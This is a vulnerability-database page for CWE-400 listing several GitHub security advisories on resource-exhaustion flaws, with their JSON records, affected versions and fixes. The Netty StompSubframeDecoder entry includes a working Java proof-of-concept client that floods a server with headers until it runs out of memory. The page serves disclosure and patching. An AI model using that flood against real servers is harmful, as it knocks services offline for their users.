Common Weakness Enumeration

CWE-400

Discouraged

Uncontrolled Resource Consumption

Abstraction: Class · Status: Draft

The product does not properly control the allocation and maintenance of a limited resource.

5412 vulnerabilities reference this CWE, most recent first.

GHSA-VH64-54PX-QGF8

Vulnerability from github – Published: 2025-03-03 16:21 – Updated: 2025-03-11 17:17
VLAI
Summary
Goroutine Leak in Abacus SSE Implementation
Details

Goroutine Leak in Abacus SSE Implementation

Summary

A critical goroutine leak vulnerability has been identified in the Abacus server's Server-Sent Events (SSE) implementation. The issue occurs when clients disconnect from the /stream endpoint, as the server fails to properly clean up resources and terminate associated goroutines. This leads to resource exhaustion where the server continues running but eventually stops accepting new SSE connections while maintaining high memory usage. The vulnerability specifically involves improper channel cleanup in the event handling mechanism, causing goroutines to remain blocked indefinitely.

POC

Impact

This vulnerability affects all versions of Abacus prior to v1.4.0. The issue causes:

  • Permanent unresponsiveness of the /stream endpoint after prolonged use
  • Memory growth that stabilizes at a high level but prevents proper functionality
  • Selective denial of service affecting only SSE connections while other endpoints remain functional
  • Accumulated orphaned goroutines that cannot be garbage collected
  • High resource consumption under sustained client connection/disconnection patterns

Systems running Abacus in production with client applications that frequently establish and terminate SSE connections are most vulnerable. The issue becomes particularly apparent in high-traffic environments or during connection stress testing.

Patches

The vulnerability has been patched in Abacus v1.4.0. The fix includes:

  1. Implementing buffered channels to prevent blocking operations during cleanup
  2. Adding proper mutex-protected cleanup logic to ensure resources are released exactly once
  3. Implementing timeout protection for channel operations to prevent deadlocks
  4. Ensuring consistent cleanup when connections terminate unexpectedly
  5. Adding improved monitoring for client disconnections using request context
  6. Restructuring the event broadcasting system to safely handle client removal

Users should upgrade to v1.4.0 or later versions as soon as possible.

Workarounds

If upgrading is not immediately possible, the following workarounds can help mitigate the issue:

  1. Limit maximum connections: Configure your reverse proxy to limit the maximum number of concurrent connections to the /stream endpoints.

  2. Implement request timeouts: Configure your infrastructure to terminate long-lived SSE connections after a reasonable period.

  3. Restart regularly: Schedule regular restarts of the Abacus service to reclaim resources.

  4. Monitor memory usage: Set up alerts for abnormal memory growth patterns.

  5. Separate instance for SSE: Run a dedicated Abacus instance solely for handling SSE connections, allowing it to be restarted without affecting the main API functionality.

References

For More Information

Please contact the Abacus security team at abacus@jsn.cam for additional information or to report further security issues.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/jasonlovesdoggo/abacus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20250302043802-898ff1204e11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-27421"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-772"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-03T16:21:46Z",
    "nvd_published_at": "2025-03-03T17:15:15Z",
    "severity": "HIGH"
  },
  "details": "## Goroutine Leak in Abacus SSE Implementation\n\n### Summary\n\nA critical goroutine leak vulnerability has been identified in the Abacus server\u0027s Server-Sent Events (SSE) implementation. The issue occurs when clients disconnect from the `/stream` endpoint, as the server fails to properly clean up resources and terminate associated goroutines. This leads to resource exhaustion where the server continues running but eventually stops accepting new SSE connections while maintaining high memory usage. The vulnerability specifically involves improper channel cleanup in the event handling mechanism, causing goroutines to remain blocked indefinitely.\n\n### [POC](https://github.com/JasonLovesDoggo/abacus/blob/main/docs/bugs/GHSA-vh64-54px-qgf8/test.py)\n\n### Impact\n\nThis vulnerability affects all versions of Abacus prior to v1.4.0. The issue causes:\n\n- Permanent unresponsiveness of the `/stream` endpoint after prolonged use\n- Memory growth that stabilizes at a high level but prevents proper functionality\n- Selective denial of service affecting only SSE connections while other endpoints remain functional\n- Accumulated orphaned goroutines that cannot be garbage collected\n- High resource consumption under sustained client connection/disconnection patterns\n\nSystems running Abacus in production with client applications that frequently establish and terminate SSE connections are most vulnerable. The issue becomes particularly apparent in high-traffic environments or during connection stress testing.\n\n### Patches\n\nThe vulnerability has been patched in Abacus v1.4.0. The fix includes:\n\n1. Implementing buffered channels to prevent blocking operations during cleanup\n2. Adding proper mutex-protected cleanup logic to ensure resources are released exactly once\n3. Implementing timeout protection for channel operations to prevent deadlocks\n4. Ensuring consistent cleanup when connections terminate unexpectedly\n5. Adding improved monitoring for client disconnections using request context\n6. Restructuring the event broadcasting system to safely handle client removal\n\nUsers should upgrade to v1.4.0 or later versions as soon as possible.\n\n### Workarounds\n\nIf upgrading is not immediately possible, the following workarounds can help mitigate the issue:\n\n1. **Limit maximum connections**: Configure your reverse proxy to limit the maximum number of concurrent connections to the `/stream` endpoints.\n\n2. **Implement request timeouts**: Configure your infrastructure to terminate long-lived SSE connections after a reasonable period.\n\n3. **Restart regularly**: Schedule regular restarts of the Abacus service to reclaim resources.\n\n4. **Monitor memory usage**: Set up alerts for abnormal memory growth patterns.\n\n5. **Separate instance for SSE**: Run a dedicated Abacus instance solely for handling SSE connections, allowing it to be restarted without affecting the main API functionality.\n\n### References\n\n- [Go Concurrency Patterns: Context](https://blog.golang.org/context)\n- [CWE-772: Missing Release of Resource after Effective Lifetime](https://cwe.mitre.org/data/definitions/772.html)\n- [OWASP Top 10: Resource Exhaustion](https://owasp.org/www-project-top-ten/2017/A5_2017-Broken_Access_Control)\n- [Resource Management in Go](https://go.dev/blog/defer-panic-and-recover)\n\n### For More Information\n\nPlease contact the Abacus security team at abacus@jsn.cam for additional information or to report further security issues.",
  "id": "GHSA-vh64-54px-qgf8",
  "modified": "2025-03-11T17:17:30Z",
  "published": "2025-03-03T16:21:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/JasonLovesDoggo/abacus/security/advisories/GHSA-vh64-54px-qgf8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27421"
    },
    {
      "type": "WEB",
      "url": "https://github.com/JasonLovesDoggo/abacus/commit/78fdb9b48b7f6d08ed0cd41077509c0a97071552"
    },
    {
      "type": "WEB",
      "url": "https://github.com/JasonLovesDoggo/abacus/commit/898ff1204e11317cc161240b660e63eed5a72b33"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/JasonLovesDoggo/abacus"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-3498"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Goroutine Leak in Abacus SSE Implementation"
}

GHSA-VH77-2VV6-G7QH

Vulnerability from github – Published: 2022-05-13 01:35 – Updated: 2022-05-13 01:35
VLAI
Details

On QFX5000 Series and EX4600 switches, a high rate of Ethernet pause frames or an ARP packet storm received on the management interface (fxp0) can cause egress interface congestion, resulting in routing protocol packet drops, such as BGP, leading to peering flaps. The following log message may also be displayed: fpc0 dcbcm_check_stuck_buffers: Buffers are stuck on queue 7 of port 45 This issue only affects the QFX5000 Series products (QFX5100, QFX5110, QFX5200, QFX5210) and the EX4600 switch. No other platforms are affected by this issue. Affected releases are Juniper Networks Junos OS: 14.1X53 versions prior to 14.1X53-D47 on QFX5000 Series and EX4600; 15.1 versions prior to 15.1R7, 15.1R8 on QFX5000 Series and EX4600; 15.1X53 versions prior to 15.1X53-D233 on QFX5000 Series and EX4600; 16.1 versions prior to 16.1R7 on QFX5000 Series and EX4600; 16.2 versions prior to 16.2R3 on QFX5000 Series and EX4600; 17.1 versions prior to 17.1R2-S9, 17.1R3 on QFX5000 Series and EX4600; 17.2 versions prior to 17.2R2-S6, 17.2R3 on QFX5000 Series and EX4600; 17.2X75 versions prior to 17.2X75-D42 on QFX5000 Series and EX4600; 17.3 versions prior to 17.3R3 on QFX5000 Series and EX4600; 17.4 versions prior to 17.4R2 on QFX5000 Series and EX4600; 18.1 versions prior to 18.1R2 on QFX5000 Series and EX4600.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-0054"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-10-10T18:29:00Z",
    "severity": "MODERATE"
  },
  "details": "On QFX5000 Series and EX4600 switches, a high rate of Ethernet pause frames or an ARP packet storm received on the management interface (fxp0) can cause egress interface congestion, resulting in routing protocol packet drops, such as BGP, leading to peering flaps. The following log message may also be displayed: fpc0 dcbcm_check_stuck_buffers: Buffers are stuck on queue 7 of port 45 This issue only affects the QFX5000 Series products (QFX5100, QFX5110, QFX5200, QFX5210) and the EX4600 switch. No other platforms are affected by this issue. Affected releases are Juniper Networks Junos OS: 14.1X53 versions prior to 14.1X53-D47 on QFX5000 Series and EX4600; 15.1 versions prior to 15.1R7, 15.1R8 on QFX5000 Series and EX4600; 15.1X53 versions prior to 15.1X53-D233 on QFX5000 Series and EX4600; 16.1 versions prior to 16.1R7 on QFX5000 Series and EX4600; 16.2 versions prior to 16.2R3 on QFX5000 Series and EX4600; 17.1 versions prior to 17.1R2-S9, 17.1R3 on QFX5000 Series and EX4600; 17.2 versions prior to 17.2R2-S6, 17.2R3 on QFX5000 Series and EX4600; 17.2X75 versions prior to 17.2X75-D42 on QFX5000 Series and EX4600; 17.3 versions prior to 17.3R3 on QFX5000 Series and EX4600; 17.4 versions prior to 17.4R2 on QFX5000 Series and EX4600; 18.1 versions prior to 18.1R2 on QFX5000 Series and EX4600.",
  "id": "GHSA-vh77-2vv6-g7qh",
  "modified": "2022-05-13T01:35:56Z",
  "published": "2022-05-13T01:35:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-0054"
    },
    {
      "type": "WEB",
      "url": "https://kb.juniper.net/JSA10888"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1041855"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VH8C-WFV5-X468

Vulnerability from github – Published: 2022-05-24 16:44 – Updated: 2022-05-24 16:44
VLAI
Details

An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with next# at the beginning and nested repetition operators.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-11389"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-185",
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-04-21T02:29:00Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with next# at the beginning and nested repetition operators.",
  "id": "GHSA-vh8c-wfv5-x468",
  "modified": "2022-05-24T16:44:03Z",
  "published": "2022-05-24T16:44:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11389"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1356"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1372"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VHCH-2WF3-M8RP

Vulnerability from github – Published: 2026-07-14 20:16 – Updated: 2026-07-14 20:16
VLAI
Summary
Netty: Denial of Service via Unbounded Headers in StompSubframeDecoder
Details

Summary

The StompSubframeDecoder fails to limit the total number of headers or their cumulative size per frame, allowing an attacker to cause an OutOfMemoryError, leading to a Denial of Service.

Details

io.netty.handler.codec.stomp.StompSubframeDecoder implements the STOMP protocol. The maxLineLength parameter restricts the length of individual header lines, but there is no mechanism to limit the total number of headers in a single STOMP frame. An attacker can send a large number of short headers (e.g., a: 1\n), which are accumulated in memory inside the DefaultStompHeadersSubframe until the JVM throws an OutOfMemoryError.

PoC

Run the server with -Xmx256m

public final class ServerApp {
    public static void main(String[] args) throws Exception {
        EventLoopGroup group = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());
        try {
            ChannelFuture serverFuture = new ServerBootstrap()
                    .group(group)
                    .channel(NioServerSocketChannel.class)
                    .childHandler(new StompSubframeDecoder())
                    .bind(8080)
                    .sync();
            serverFuture.channel().closeFuture().sync();
        } finally {
            group.shutdownGracefully();
        }
    }
}
public final class ClientApp {
    public static void main(String[] args) throws Exception {
        try (Socket socket = new Socket("127.0.0.1", 8080)) {
            OutputStream out = socket.getOutputStream();

            out.write("CONNECT\n".getBytes(StandardCharsets.UTF_8));

            StringBuilder sb = new StringBuilder();
            for (int i = 0; i < 1000; i++) {
                sb.append("a:1\n");
            }
            byte[] bulkHeaders = sb.toString().getBytes(StandardCharsets.UTF_8);

            for (int i = 1; i <= 50_000; i++) {
                out.write(bulkHeaders);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Impact

Denial of Service: An attacker can easily exhaust the server's memory by sending a single malicious STOMP message. Any server exposing a STOMP endpoint based on StompSubframeDecoder is vulnerable to DoS.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.2.15.Final"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "io.netty:netty-codec-stomp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.2.0.Alpha1"
            },
            {
              "fixed": "4.2.16.Final"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.1.135.Final"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "io.netty:netty-codec-stomp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.136.Final"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44891"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-14T20:16:34Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nThe StompSubframeDecoder fails to limit the total number of headers or their cumulative size per frame, allowing an attacker to cause an OutOfMemoryError, leading to a Denial of Service.\n\n### Details\n`io.netty.handler.codec.stomp.StompSubframeDecoder` implements the STOMP protocol. The `maxLineLength` parameter restricts the length of individual header lines, but there is no mechanism to limit the total number of headers in a single STOMP frame. An attacker can send a large number of short headers (e.g., `a: 1\\n`), which are accumulated in memory inside the `DefaultStompHeadersSubframe` until the JVM throws an OutOfMemoryError.\n\n### PoC\nRun the server with `-Xmx256m`\n\n```java\npublic final class ServerApp {\n    public static void main(String[] args) throws Exception {\n        EventLoopGroup group = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());\n        try {\n            ChannelFuture serverFuture = new ServerBootstrap()\n                    .group(group)\n                    .channel(NioServerSocketChannel.class)\n                    .childHandler(new StompSubframeDecoder())\n                    .bind(8080)\n                    .sync();\n            serverFuture.channel().closeFuture().sync();\n        } finally {\n            group.shutdownGracefully();\n        }\n    }\n}\n```\n\n```java\npublic final class ClientApp {\n    public static void main(String[] args) throws Exception {\n        try (Socket socket = new Socket(\"127.0.0.1\", 8080)) {\n            OutputStream out = socket.getOutputStream();\n\n            out.write(\"CONNECT\\n\".getBytes(StandardCharsets.UTF_8));\n\n            StringBuilder sb = new StringBuilder();\n            for (int i = 0; i \u003c 1000; i++) {\n                sb.append(\"a:1\\n\");\n            }\n            byte[] bulkHeaders = sb.toString().getBytes(StandardCharsets.UTF_8);\n\n            for (int i = 1; i \u003c= 50_000; i++) {\n                out.write(bulkHeaders);\n            }\n        } catch (Exception e) {\n            e.printStackTrace();\n        }\n    }\n}\n```\n\n### Impact\nDenial of Service: An attacker can easily exhaust the server\u0027s memory by sending a single malicious STOMP message. Any server exposing a STOMP endpoint based on StompSubframeDecoder is vulnerable to DoS.",
  "id": "GHSA-vhch-2wf3-m8rp",
  "modified": "2026-07-14T20:16:34Z",
  "published": "2026-07-14T20:16:34Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/netty/netty/security/advisories/GHSA-vhch-2wf3-m8rp"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/netty/netty"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Netty: Denial of Service via Unbounded Headers in StompSubframeDecoder"
}

GHSA-VHFQ-GPQW-P5CW

Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-20 12:32
VLAI
Details

A Regular Expression Denial of Service (ReDoS) vulnerability exists in gaizhenbiao/chuanhuchatgpt, as of commit 20b2e02. The server uses the regex pattern r'<[^>]+>' to parse user input. In Python's default regex engine, this pattern can take polynomial time to match certain crafted inputs. An attacker can exploit this by uploading a malicious JSON payload, causing the server to consume 100% CPU for an extended period. This can lead to a Denial of Service (DoS) condition, potentially affecting the entire server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-10955"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-20T10:15:22Z",
    "severity": "MODERATE"
  },
  "details": "A Regular Expression Denial of Service (ReDoS) vulnerability exists in gaizhenbiao/chuanhuchatgpt, as of commit 20b2e02. The server uses the regex pattern `r\u0027\u003c[^\u003e]+\u003e\u0027` to parse user input. In Python\u0027s default regex engine, this pattern can take polynomial time to match certain crafted inputs. An attacker can exploit this by uploading a malicious JSON payload, causing the server to consume 100% CPU for an extended period. This can lead to a Denial of Service (DoS) condition, potentially affecting the entire server.",
  "id": "GHSA-vhfq-gpqw-p5cw",
  "modified": "2025-03-20T12:32:41Z",
  "published": "2025-03-20T12:32:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10955"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/8291f8d0-5060-47e7-9986-1f411310fb7b"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VHFW-V69P-CRCW

Vulnerability from github – Published: 2022-06-17 21:44 – Updated: 2022-09-01 20:11
VLAI
Summary
Uncontrolled Resource Consumption in OPCFoundation.NetStandard.Opc.Ua.Core
Details

A vulnerability was discovered in the OPC UA .NET Standard Stack that allows a malicious client to cause a server to trigger an out of memory exception by sending a large number of message chunks.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.4.368.53"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "OPCFoundation.NetStandard.Opc.Ua.Core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.368.58"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-29864"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-06-17T21:44:58Z",
    "nvd_published_at": "2022-06-16T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability was discovered in the OPC UA .NET Standard Stack that allows a malicious client to cause a server to trigger an out of memory exception by sending a large number of message chunks.",
  "id": "GHSA-vhfw-v69p-crcw",
  "modified": "2022-09-01T20:11:21Z",
  "published": "2022-06-17T21:44:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OPCFoundation/UA-.NETStandard/security/advisories/GHSA-vhfw-v69p-crcw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29864"
    },
    {
      "type": "WEB",
      "url": "https://files.opcfoundation.org/SecurityBulletins/OPC%20Foundation%20Security%20Bulletin%20CVE-2022-29864.pdf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OPCFoundation/UA-.NETStandard"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Uncontrolled Resource Consumption in OPCFoundation.NetStandard.Opc.Ua.Core"
}

GHSA-VHJ2-4H8C-JC8M

Vulnerability from github – Published: 2025-04-29 03:30 – Updated: 2025-04-29 15:31
VLAI
Details

The issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.4, tvOS 18.4, macOS Ventura 13.7.5, iPadOS 17.7.6, macOS Sonoma 14.7.5, iOS 18.4 and iPadOS 18.4, watchOS 11.4, visionOS 2.4. An attacker on the local network may cause an unexpected app termination.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-24251"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-29T03:15:34Z",
    "severity": "MODERATE"
  },
  "details": "The issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.4, tvOS 18.4, macOS Ventura 13.7.5, iPadOS 17.7.6, macOS Sonoma 14.7.5, iOS 18.4 and iPadOS 18.4, watchOS 11.4, visionOS 2.4. An attacker on the local network may cause an unexpected app termination.",
  "id": "GHSA-vhj2-4h8c-jc8m",
  "modified": "2025-04-29T15:31:50Z",
  "published": "2025-04-29T03:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24251"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/122371"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/122372"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/122373"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/122374"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/122375"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/122376"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/122377"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/122378"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VJ49-J7RC-H54F

Vulnerability from github – Published: 2023-08-25 21:30 – Updated: 2023-09-01 17:35
VLAI
Summary
Esoteric YamlBeans XML Entity Expansion vulnerability
Details

An issue was discovered in Esoteric YamlBeans through 1.15. A crafted YAML document is able perform am XML Entity Expansion attack against YamlBeans YamlReader. By exploiting the Anchor feature in YAML, it is possible to generate a small YAML document that, when read, is expanded to a large size, causing CPU and memory consumption, such as a Java Out-of-Memory exception.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.esotericsoftware.yamlbeans:yamlbeans"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-24620"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-08-25T22:04:01Z",
    "nvd_published_at": "2023-08-25T20:15:07Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in Esoteric YamlBeans through 1.15. A crafted YAML document is able perform am XML Entity Expansion attack against YamlBeans YamlReader. By exploiting the Anchor feature in YAML, it is possible to generate a small YAML document that, when read, is expanded to a large size, causing CPU and memory consumption, such as a Java Out-of-Memory exception.",
  "id": "GHSA-vj49-j7rc-h54f",
  "modified": "2023-09-01T17:35:22Z",
  "published": "2023-08-25T21:30:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-24620"
    },
    {
      "type": "WEB",
      "url": "https://contrastsecurity.com"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Contrast-Security-OSS/yamlbeans/blob/main/SECURITY.md"
    },
    {
      "type": "WEB",
      "url": "https://github.com/EsotericSoftware"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/EsotericSoftware/yamlbeans"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Esoteric YamlBeans XML Entity Expansion vulnerability"
}

GHSA-VJPV-X8P9-7P85

Vulnerability from github – Published: 2024-07-10 06:33 – Updated: 2024-07-10 21:28
VLAI
Summary
images vulnerable to Denial of Service
Details

All versions of the package images are vulnerable to Denial of Service (DoS) due to providing unexpected input types to several different functions. This makes it possible to reach an assert macro, leading to a process crash.

Note: By providing some specific integer values (like 0) to the size function, it is possible to obtain a Segmentation fault error, leading to the process crash.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "images"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "3.2.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-21523"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-241",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-10T21:28:42Z",
    "nvd_published_at": "2024-07-10T05:15:11Z",
    "severity": "HIGH"
  },
  "details": "All versions of the package images are vulnerable to Denial of Service (DoS) due to providing unexpected input types to several different functions. This makes it possible to reach an assert macro, leading to a process crash.\n\n**Note:**\nBy providing some specific integer values (like 0) to the size function, it is possible to obtain a Segmentation fault error, leading to the process crash.",
  "id": "GHSA-vjpv-x8p9-7p85",
  "modified": "2024-07-10T21:28:42Z",
  "published": "2024-07-10T06:33:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21523"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/dellalibera/8b4ea6b4db84cba212e6e6e39a6933d1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/zhangyuanwei/node-images"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zhangyuanwei/node-images/blob/691d49f4e620b4eec9f1c47b1735841d9d8b55f6/src/Image.cc"
    },
    {
      "type": "WEB",
      "url": "https://security.snyk.io/vuln/SNYK-JS-IMAGES-6421826"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "images vulnerable to Denial of Service"
}

GHSA-VJXC-FRW4-JMH5

Vulnerability from github – Published: 2022-05-24 17:07 – Updated: 2022-11-07 22:04
VLAI
Summary
Undertow vulnerable to Uncontrolled Resource Consumption
Details

A vulnerability was found in the Undertow HTTP server in versions before 2.0.29 when listening on HTTPS. An attacker can target the HTTPS port to carry out a Denial Of Service (DOS) to make the service unavailable on SSL.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.undertow:undertow-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.29.Final"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2019-14888"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-11-07T22:04:19Z",
    "nvd_published_at": "2020-01-23T17:15:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability was found in the Undertow HTTP server in versions before 2.0.29 when listening on HTTPS. An attacker can target the HTTPS port to carry out a Denial Of Service (DOS) to make the service unavailable on SSL.",
  "id": "GHSA-vjxc-frw4-jmh5",
  "modified": "2022-11-07T22:04:19Z",
  "published": "2022-05-24T17:07:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14888"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2020:0729"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14888"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20220211-0001"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Undertow vulnerable to Uncontrolled Resource Consumption"
}

Mitigation
Architecture and Design

